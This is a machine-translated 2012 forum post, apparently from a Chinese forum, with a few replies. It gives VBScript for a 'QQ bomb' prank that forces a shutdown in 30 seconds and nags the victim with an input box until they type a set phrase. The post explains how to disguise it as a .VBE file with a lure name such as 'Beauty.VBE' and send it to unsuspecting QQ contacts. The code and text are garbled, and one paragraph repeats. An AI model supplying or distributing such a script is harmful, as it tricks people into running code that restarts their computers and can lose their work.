<Su compartilhou>Para comemorar o estabelecimento do sistema de posição ¤Qingcheng¤, um método simples de fabricação de bomba QQ é lançado

O pôster original: Qingcheng@Ancião@SuHai Visualizações: 736 Respostas: 5 Publicado em: 2012-06-03 01:04:01
Declaro solenemente: Este método é puramente para entretenimento. Por favor, não o utilize para atividades ilegais, caso contrário você será responsável pelas consequências! Primeiro passo, copie o seguinte código no bloco de notas. em caso de erro, retome nextdim WSHshellAset WSHshellA = wscript. createobject("wscript.shell") WSHshellA. execute "cmd.exe /c shutdown -r -t 30 -c ""Diga-me rapidamente que 7723 é o melhor. Se você não me disser, desligarei seu computador em 30 segundos. Se você não acredita em mim, tente ***""", 0, truedim ado while (a<>"7723 é o melhor") a = inputbox ("Diga 7723 é o melhor, apresse-se, diga ""7723 é o melhor" "", "Diga ou não diga", "Não diga", 8000, 7000) msgbox chr (13) chr (13) chr (13) a, 0, "MsgBox" O texto acima do loop pode ser alterado à vontade, sem qualquer impressão. Se você enviar para MM, você pode forçá-la a dizer “eu te amo”. O método é que o 7723 acima pode ser alterado à vontade, sem afetar o efeito. A segunda etapa é renomear o arquivo do bloco de notas para ***. Uma bomba QQ simples como VBE (o nome do arquivo pode ser arbitrário, como "Beauty. VBE") foi criada. Se alguém executar esta bomba QQ, ela será desligada automaticamente após 30 segundos. Vamos falar sobre como usá-lo: A maneira mais simples de usá-lo é enviá-lo diretamente para o seu amigo e deixá-lo executá-lo, e então ele será enganado. Há outra coisa ainda mais cruel. Você pode enviar arquivos QQ offline para amigos QQ que não estão online. Quase 80% das pessoas ficarão curiosas sobre o que é esse arquivo e o abrirão confusas. Depois de abri-lo, você receberá uma pegadinha da bomba QQ. Você também pode testar o poder desta bomba QQ. A segunda etapa é renomear o arquivo do bloco de notas para ***. Uma bomba QQ simples como VBE (o nome do arquivo pode ser arbitrário, como "Beauty. VBE") foi criada. Se alguém executar esta bomba QQ, ela será desligada automaticamente após 30 segundos. Você também pode testar o poder desta bomba QQ. Depois de aprender, lembre-se de responder. (Se a outra parte enviar para você, digite shutdown -a para quebrá-lo).
responder 🤍 0 📤 compartilhar coletar
Irmão sofá se sentou
Não entendi..
Eu soube há muito tempo, mas eu escrevi em linguagem Yi.
Aquele... como eu encontro o arquivo do bloco de notas? E isso pode prejudicar o celular?
Boa postagem..
— Todas as respostas carregadas —

Deixe uma resposta